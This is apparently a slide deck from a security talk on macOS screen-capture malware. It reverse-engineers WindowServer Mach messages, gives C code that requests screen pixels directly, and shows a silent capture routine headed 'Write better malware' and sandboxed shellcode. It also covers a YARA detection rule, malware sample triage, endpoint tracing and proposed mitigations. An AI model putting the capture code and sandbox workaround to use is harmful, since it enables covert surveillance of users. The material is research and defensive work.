  • 13. // __CGSNewConnectionPort mach_msg_header_t* req_port = (mach_msg_header_t*)buffer; req_port->msgh_bits = 0x80001513; req_port->msgh_size = 1; req_port->msgh_remote_port = serv_port; req_port->msgh_local_port = mig_get_reply_port(); req_port->msgh_voucher_port = 0; req_port->msgh_id = 0x7468; uint32_t* values = (uint32_t*) (buffer + sizeof(mach_msg_header_t)); values[1] = port_right; // set the voucher voucher_mach_msg_set(req_port); mach_msg_return_t ret = mach_msg(req_port, 0x3, 0x48, 60, req_port->msgh_local_port, 0, 0); mach_port_t session_port = ( (mach_port_t*)buffer )[7]; __text:5394 __CGSNewConnectionPort proc near ; CODE XREF: _SLSNewConnection+1DDp ; _SLSNewConnection+240p ... __text:5430 mov [rbp+msg.msgh_bits], 80001513h __text:543A mov [rbp+msg.msgh_remote_port], r12d __text:5441 call _mig_get_reply_port __text:5446 mov [rbp+msg.msgh_local_port], eax __text:544C mov [rbp+msg.msgh_id], 7468h __text:5456 mov [rbp+msg.msgh_reserved], 0 __text:5460 cmp cs:_voucher_mach_msg_set_ptr, 0 __text:5468 jz short loc_547D __text:546A lea r14, [rbp+msg] __text:5471 mov rdi, r14 __text:5474 call _voucher_mach_msg_set __text:5479 mov eax, [r14+0Ch] __text:547D loc_547D: __text:547D mov [rsp+480h+notify], 0 ; notify __text:5484 lea rdi, [rbp+msg] ; msg __text:548B mov esi, 3 ; option __text:5490 mov ecx, 3Ch ; '<' ; rcv_size __text:5495 xor r9d, r9d ; timeout __text:5498 mov r8d, eax ; rcv_name __text:549B mov edx, ebx ; send_size __text:549D call _mach_msg Into the bytes 2) make session
  • 14. Into the bytes 3) get pixels __text:1F796C _SLSHWCaptureDesktop proc near ; CODE XREF: _SLDisplayCreateImage+1Dp ; _SLDisplayCreateImageForRect+F7p ... __text:1F8364 mov dword ptr [rbp+msg_body10_var_80 +4], eax __text:1F8367 mov [rbp+msg.msgh_bits ], 1513h __text:1F8371 mov eax, [rbp+remote_port ] __text:1F8377 mov [rbp+msg.msgh_remote_port ], eax __text:1F837D call _mig_get_reply_port __text:1F8382 mov [rbp+msg.msgh_local_port ], eax __text:1F8388 mov [rbp+msg.msgh_id], 732Ah __text:1F8392 mov [rbp+msg.msgh_reserved ], 0 __text:1F839C cmp cs:_voucher_mach_msg_set_ptr , 0 __text:1F83A4 jz short loc_1F83B8 __text:1F83A6 lea rdi, [rbp+msg] __text:1F83AD call _voucher_mach_msg_set __text:1F83B2 mov eax, [rbp+msg.msgh_local_port ] __text:1F83B8 loc_1F83B8 : __text:1F83B8 sub rsp, 8 __text:1F83BC mov esi, 3 ; option __text:1F83C1 mov edx, 72 ; send_size __text:1F83C6 mov ecx, 136 ; rcv_size __text:1F83CB xor r9d, r9d ; timeout __text:1F83CE lea rdi, [rbp+msg] ; msg __text:1F83D5 mov r8d, eax ; rcv_name __text:1F83D8 push 0 ; notify __text:1F83DA call _mach_msg struct req_msg* rq_msg = (struct req_msg*)buffer; // ... rq_msg->header.msgh_id = 0x732A; // x, y, width, height rq_msg->x = 0.0; rq_msg->y = 0.0; rq_msg->width = 1024.0; rq_msg->height = 768.0; // display id values (vm: 0x5b81c5c0, non-vm: 0x042499b0) rq_msg->display_id = 0x042499b0; rq_msg->param5 = 0x00000441; // set the voucher voucher_mach_msg_set(&rq_msg->header); if(mach_msg(&rq_msg->header, 0x3, 0x48, 0x88, rq_msg->header.msgh_local_port, 0, 0) != MACH_MSG_SUCCESS) {} mig_put_reply_port(rq_msg->header.msgh_local_port); uint32_t object = *(uint32_t*) ( ((u_char*)buffer) + sizeof(mach_msg_header_t) + 4); if(mach_vm_map(self, rq_msg, size, 0, 0x1, object, 0x0, false, 3, 3, true) != KERN_SUCCESS) { }
  • 15. Putting it all together Write better malware void doCGCapture() { CGDirectDisplayID displays[256]; uint32_t dispCount = 0; CGGetActiveDisplayList(256, displays, &dispCount); for(int i = 0; i < dispCount ; i++) { CGDirectDisplayID dispId = displays [i]; CGImageRef img = CGDisplayCreateImage(dispId); char path_str[1024]; snprintf(path_str, 1023, "./image%d.png", i); CFURLRef path = CFURLCreateWithFileSystemPath (NULL, __CFStringMakeConstantString (path_str ), kCFURLPOSIXPathStyle , false); CGImageDestinationRef destination = CGImageDestinationCreateWithURL( path, CFSTR("public.png"), 1, NULL); CGImageDestinationAddImage(destination, img, nil); CGImageDestinationFinalize(destination); } } List all displays Create image from display Encode and write image to file No Shutter sound (-x)!
  • 16. Sniffing mach via injection $ DYLD_INSERT_LIBRARIES=xpcsnoop.dylib ScreenShotTester Packet Number (mach_msg): 44 0 mach_snoop.dylib 0x00000001098806b0 my_mach_msg + 112 1 SkyLight 0x00007fff4bde7e4b SLSHWCaptureDesktop + 2675 2 SkyLight 0x00007fff4bdeaf86 SLDisplayCreateImage + 34 3 ScreenShotTester 0x0000000109874b7a capture_id + 42 4 ScreenShotTester 0x0000000109874db2 doCGCapture + 210 5 ScreenShotTester 0x0000000109874e1f main + 47 6 libdyld.dylib 0x00007fff51dc3015 start + 1 thread id: 2372 msgh_bits: 131513 msgh_size: 0 (fcn param: 72) ports: 607 -> 2713 msgh_reserved: B03 msgh_id: 732A mach_msg: 0000 13 15 13 00 00 00 00 00 | 13 27 00 00 07 06 00 00 .........'...... 0010 03 0b 00 00 2a 73 00 00 | 00 00 00 00 01 00 00 00 ....*s.......... 0020 00 00 00 00 00 00 00 00 | 00 00 00 00 00 00 00 00 ................ 0030 00 00 00 00 00 40 9a 40 | 00 00 00 00 00 68 90 40 .....@.@.....h.@ 0040 bd f9 d7 7b 41 04 00 00 ...{A... static const interpose_t interposing_functions[] __attribute__ ((used,section("__DATA, __interpose"))) = { { (void*) my_bootstrap_look_up2, (void*)bootstrap_look_up2 }, { (void*) my_mach_msg, (void*)mach_msg }, { (void*) my_mach_msg_overwrite, (void*)mach_msg_overwrite }}; Inject and intercept mach related function calls. Preferably on a small set of API’s due to volume of messages
  • 17. 1. msgh_id = 0x7152 // start a session 2. msgh_id = 0x7148 // test connection, get MIG version 3. msgh_id = 0x7475 // display state, find the display ID 4. msgh_id = 0x7468 // create secondary session 5. msgh_id = 0x732A // request screen pixels 6. mach_vm_map // map pixels to local process memory Mach msg sequence MIG
  • 18. There is more than one way There usually is! CGImageRef screenshot = CGWindowListCreateImage( CGRectInfinite, kCGWindowListOptionOnScreenOnly, kCGNullWindowID, kCGWindowImageDefault); NSBitmapImageRep *bitmapRep = [[NSBitmapImageRep alloc] initWithCGImage:screenshot]; https://krausefx.com/blog/mac-privacy-sandboxed-mac-apps-can-take-screenshots rdar://37423927
  • 19. The sandbox will protect me sometimes
  • 20. Malware in action video demo 1. Cocoa base application 2. Runs in a full sandbox 3. File write allowed for demo
  • 21. (allow mach-lookup (global-name "com.apple.windowserver.active")) ● cdm.sb: ○ Content Decryption Module (CDM). A CDM is required for a media renderer, audio decoder or video decoder to handle protected content (chromium). ● gpu_v2.sb ○ Allow communication between the GPU process and the UI server. ● ppapi_v2.sb ○ Pepper Plugin API (PPAPI) was initially only supported by Google Chrome and Chromium. Later, other Chromium-based browsers such as Opera and Vivaldi, also added PPAPI plugin support. Sandbox Chrome https://www.chromium.org/developers/design-documents/sandbox/osx-sandboxing-design
  • 22. // The "Safe Mode" Flash NPAPI plugin process profile static const char flashPluginSandboxRules[] = R"SANDBOX_LITERAL( ; Services (allow mach-lookup (global-name "com.apple.windowserver.active") Sandbox firefox static const char widevinePluginSandboxRulesAddend[] = R"SANDBOX_LITERAL( (allow mach-lookup (global-name "com.apple.windowserver.active")) ) SANDBOX_LITERAL"; https://hg.mozilla.org/mozilla-central/file/tip/security/sandbox/mac/SandboxPolicies.h - Widevine DRM is also used with the Chromium web browser and on Android. static const char contentSandboxRules[] = R"SANDBOX_LITERAL( (version 1) (if (string=? hasWindowServer "TRUE") (allow mach-lookup (global-name "com.apple.windowserver.active")))
  • 23. Sandbox Positron - a experimental, Electron-compatible runtime on top of Gecko static const char widevinePluginSandboxRulesAddend[] = "(allow mach-lookup (global-name "com.apple.windowserver.active"))n"; https://github.com/mozilla/positron/blob/master/security/sandbox/mac/Sandbox.mm - Widevine DRM is also used with the Chromium web browser and on Android. static const char contentSandboxRules[] = "(version 1)n" "n" "(define sandbox-level %d)n" " (allow mach-lookupn" " (global-name "com.apple.windowserver.active")n"
  • 24. Window server gets abused a lot: https://blog.ret2.io/2018/07/25/pwn2own-2018-safari-sandbox/ Sandbox Safari - Webkit com.apple.WebProcess.sb.in: (allow mach-lookup #if __MAC_OS_X_VERSION_MIN_REQUIRED >= 101400 #else (global-name "com.apple.windowserver.active") #endif ) #if __MAC_OS_X_VERSION_MIN_REQUIRED >= 101400 (deny mach-lookup (with no-log) (global-name "com.apple.windowserver.active")) #endif com.apple.WebKit.plugin-common.sb.in: ;; Various services required by AppKit ;; and other frameworks (allow mach-lookup (global-name "com.apple.windowserver.active") https://github.com/WebKit/webkit
  • 25. Why is that an issue? Protected by sandbox python extractshell.py -o screencap -s screencap.b hexdump -C screencap.b 00000000 55 41 57 41 56 41 55 41 54 53 48 81 ec 48 08 00 |UAWAVAUATSH..H..| 00000010 00 31 ed 48 8d 5c 24 34 89 2b 4c 8d 74 24 2c 41 |.1.H.$4.+L.t$,A| 00000020 89 2e 4c 8b 25 6c 06 00 00 41 8b 3c 24 be 04 00 |..L.%l...A.<$...| … 000003f0 40 13 15 00 00 89 44 24 48 e8 45 01 00 00 89 44 |@.....D$H.E....D| 00000400 24 4c 48 b8 00 00 00 00 2a 73 00 00 48 89 44 24 |$LH.....*s..H.D$| 00000410 50 c6 44 24 5c 01 0f 57 c0 0f 29 44 24 60 0f 28 |P.D$..W..)D$`.(| … 00000510 00 00 00 63 6f 6d 2e 61 70 70 6c 65 2e 77 69 6e |...com.apple.win| 00000520 64 6f 77 73 65 72 76 65 72 2e 61 63 74 69 76 65 |dowserver.active| Shellcode can do it in about 9076 bytes mach_msg and mach_vm_map are mach system calls Can networking and windowserver be accessed at the same time? https://github.com/nologic/shellcc SHELLCC is a build environment for making shellcode in C using GCC and other binary tool. It is meant to enable people with limited knowledge of assembly to write quality shellcode as well as bring code maintainability by using a high level language.
  • 26. Chrome is active: Sublime has these documents open: And now, the terminal: Efficient collection Thanks touchbar ● Screenshot of regular resolution is about: 1.4M PNG Compressed. ● An image of touchbar can be used for a more efficient selection of timing.
  • 27. What malware is out there? ... in the wild
  • 28. Basic triage* signatures Static analysis disassembly Static analysis partial emulation Dynamic analysis Sandboxing Dynamic analysis Emulation Manual analysis APT! rule combined_screen_cap { strings: $utility = "/usr/sbin/screencapture" nocase $lib = "CoreGraphics" $func = "CGDisplayCreateImage" $mov_msg_id = { C7 ?? 54 FF FF FF 2A 73 00 00 } $mach_msg = "_mach_msg" condition: $utility or ($lib and $func) or ($mov_msg_id and $mach_msg) } Querying for screencapture capability on VirusTotal
  • 29. Finding malware thanks VT/Yara 1124 matched samples 15 Anti-virus (AV) flagged 6 Sample with great than 1 AV Great for research, need better rules for anything production Simple static signatures aren’t great for endpoint protection
  • 30. while [ -z "$DONE" ]; do DONE="done" for hash in `cat hashes`; do if [ -z "`cat $hash.json`" ]; then curl -s --request POST --url 'https://www.virustotal.com/vtapi/v2/file/report' -d apikey=${APIKEY} -d "resource=$hash" > $hash.json cat $hash.json sleep 2 DONE= fi done sleep 2 done Filtering samples Getting around throttling
  • 31. Meeting the malware: Mokes 664e0a048f61a76145b55d1f1a5714606953d69edccec5228017eb546049dc8c Mokes ● Uses CoreGraphics via Qt ● Specifically: QCocoaScreen::grabWindow ● Capturing Screen (every 30 sec.) QPixmap QCocoaScreen::grabWindow(WId window, int x, int y, int width, int height) const { // 128 displays should be enough // for everyone. const int maxDisplays = 128; CGDirectDisplayID displays[maxDisplays]; CGDisplayCount displayCount; ... for (uint i = 0; i < displayCount; ++i) { const CGRect bounds = CGDisplayBounds(displays[i]); ... QCFType<CGImageRef> cgImage = CGDisplayCreateImage(displays[i]); const QImage image = qt_mac_toQImage(cgImage); } }
  • 32. Meeting the malware: Macs 6acd92d0dfe3e298d73b78a3dcc6d52ff4f85a70a9f2d0dcfe7ae4af2dd685cc Macs ● Uses ‘/usr/sbin/screencapture -x [] -T 20’ ● It dumps screenshots into a folder called MacApp
  • 33. Meeting the malware: blackhole d1a0c589b3ac33626d47156aaa938be92ba3d6f889de5a6f62d4afe0ac2cf65a blackhole ● Comes with a PPC version ○ why?! ● /usr/sbin/screencapture -x /Applications/.JavaUpdater/.Data/Screen.png ● No one reports on screen capture capability
  • 34. Meeting the malware: Eh?! f1e98602683603bab5e08de8dc00e62ae27bf4ed6164f3e45ab26628f5453481 vmdk part with malware ● I’m not malware ● Why would someone upload this to VT? ● References screencapture but nothing directly executable $ strings f1e98602683603bab5e08de8dc00e62ae27bf4ed6164f3e45ab26628f5453481 | grep screencapture Pscreencapture I,screencapture -T 0 -x 1.png/miner.sh %s %u %s %s/polipo -c polipo.cfgtcp jO/usr/sbin/screencapture/bin/sh/usr/bin/curlX-ASIHTTPRequest-Expiresm_FolderList m_zipUploadm_ComputerName_UserNamem_uploadURL/lang.php $ hexdump -C f1e98602683603bab5e08de8dc00e62ae27bf4ed6164f3e45ab26628f5453481 | head 00000000 4b 44 4d 56 01 00 00 00 03 00 00 00 00 00 7f 00 |KDMV............| 00000010 00 00 00 00 80 00 00 00 00 00 00 00 00 00 00 00 |................| 00000020 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 00 |................| Definitely some kind of malware in there
  • 35. Meeting the malware: WINDSHIFT Need a hash Recent findings by DarkMatter at HiTB APT?
  • 36. How do we find the behavior? on OS X
  • 37. On the endpoint file attributes $ mdfind kMDItemIsScreenCapture = 1 /Users/nl/Desktop/Screen Shot 2018-05-15 at 10.52.35 PM.png /Users/nl/Desktop/Screen Shot 2018-04-24 at 6.26.21 PM.png /Users/nl/Desktop/Screen Shot 2018-04-24 at 6.25.52 PM.png $ ls -l@ "Screen Shot 2018-05-15 at 10.52.35 PM.png" -rw-r--r--@ 1 nl staff 120087 May 15 22:52 /Users/nl/Desktop/Screen Shot 2018-05-15 at 10.52.35 PM.png com.apple.FinderInfo 32 com.apple.lastuseddate#PS 16 com.apple.metadata:kMDItemIsScreenCapture 42 com.apple.metadata:kMDItemScreenCaptureGlobalRect 86 com.apple.metadata:kMDItemScreenCaptureType 51 $ mdls "Screen Shot 2018-05-15 at 10.52.35 PM.png" _kMDItemDisplayNameWithExtensions = "Screen Shot 2018-05-15 at 10.52.35 PM.png" kMDItemIsScreenCapture = 1 $ xattr -l "Screen Shot 2018-05-15 at 10.52.35 PM.png" com.apple.metadata:kMDItemIsScreenCapture: 00000000 62 70 6C 69 73 74 30 30 09 08 00 00 00 00 00 00 |bplist00........| 00000010 01 01 00 00 00 00 00 00 00 01 00 00 00 00 00 00 |................| 00000020 00 00 00 00 00 00 00 00 00 09 1. Who created the file? 2. Why would malware set this attribute? 3. Why would malware create a file?
  • 38. $ sudo frida-trace -a 'SkyLight!43287' WindowServer Instrumenting functions... sub_43287: Auto-generated handler at "./__handlers__/SkyLight/sub_43287.js" Started tracing 1 function. Press Ctrl+C to stop. /* TID 0x307 */ 6791 ms sub_43287() On the endpoint tracing functions _XHWCaptureDesktop 1. Frida/DTrace lite-weight tracing frameworks 2. Proper debugging is too heavy 3. Thwarted by SIP on OS X (Good! But blunt)
  • 39. On the endpoint who did it?! * thread #1, queue = 'com.apple.main-thread', stop reason = breakpoint 1.1 frame #0: 0x00007fff544c3287 SkyLight`_XHWCaptureDesktop SkyLight`_XHWCaptureDesktop: -> 0x7fff544c3287 <+0>: pushq %rbp 0x7fff544c3288 <+1>: movq %rsp, %rbp 0x7fff544c328b <+4>: pushq %r15 0x7fff544c328d <+6>: pushq %r14 Target 0: (WindowServer) stopped. (lldb) x/10wx $rdi 0x7ffee4c12610: 0x00001112 0x00000048 0x000153ab 0x0001249b 0x7ffee4c12620: 0x00000000 0x0000732a 0x00000000 0x00000001 0x7ffee4c12630: 0x00000000 0x00000000 $ sudo lsmp -a Process (4460) : screencapture name ipc-object rights identifier type --------- ---------- ---------- ----------- ------------ 0x00000103 0x56e57599 send 0x00000000 TASK SELF (4460) screencapture 0x00000507 0x56e57a31 send 0x00000000 THREAD (0x7faf5) 0x00000603 0x56e56729 recv + send-once 0x000153ab (157) WindowServer 1. Breakpoint in WindowServer 2. First parameter is the mach message 3. We can see the source port 4. Using source port we can get the PID/Task of the source process
  • 40. Can I defend myself? on OS X
  • 41. OS Mitigations 1) proposal: logging Build a mechanism for allowing logging or trapping functions in SIP protected processes Notification popup for any app that triggered screen capture
  • 42. OS Mitigations 2) proposal: filter Mach ports pass messages. It’s high time that a firewall is developed to block certain messages on demand: ○ Message ID 732Ah is a request for a screencapture. ○ Could be defined in the same way as sandbox permissions: (deny mach-msg (mach-msg-id 0x732a)) ○ Performance concerns balanced via ports/processes selection
  • 43. OS Mitigations 3) proposal: permissions Only sandboxed applications with proper entitlements should be given access to API’s that access pixels of other applications.* * macOS Mojave: New data protections require apps to get user permission before using Mac camera and microphone (It’s a start)
  • 45. Some malware is thorny! ... but “In particular, our study concludes that targeted malware does not use more anti-debugging and anti-VM techniques than generic malware, although targeted malware tend to have a lower antivirus detection rate.” -- “Advanced or not?..,” P. Chen, et. al.
  • 46. ● Lots of malware steals pixels ● Can do it direct through Mach Interfaces ● Sandboxes don’t help... Maybe a little. ● Proposed mitigations. Thoughts? Conclusion takeaways
  • 48. ● https://pixabay.com/ ● http://highlight.hohli.com/ ● Objective-See ● Objective By The Sea Thanks all!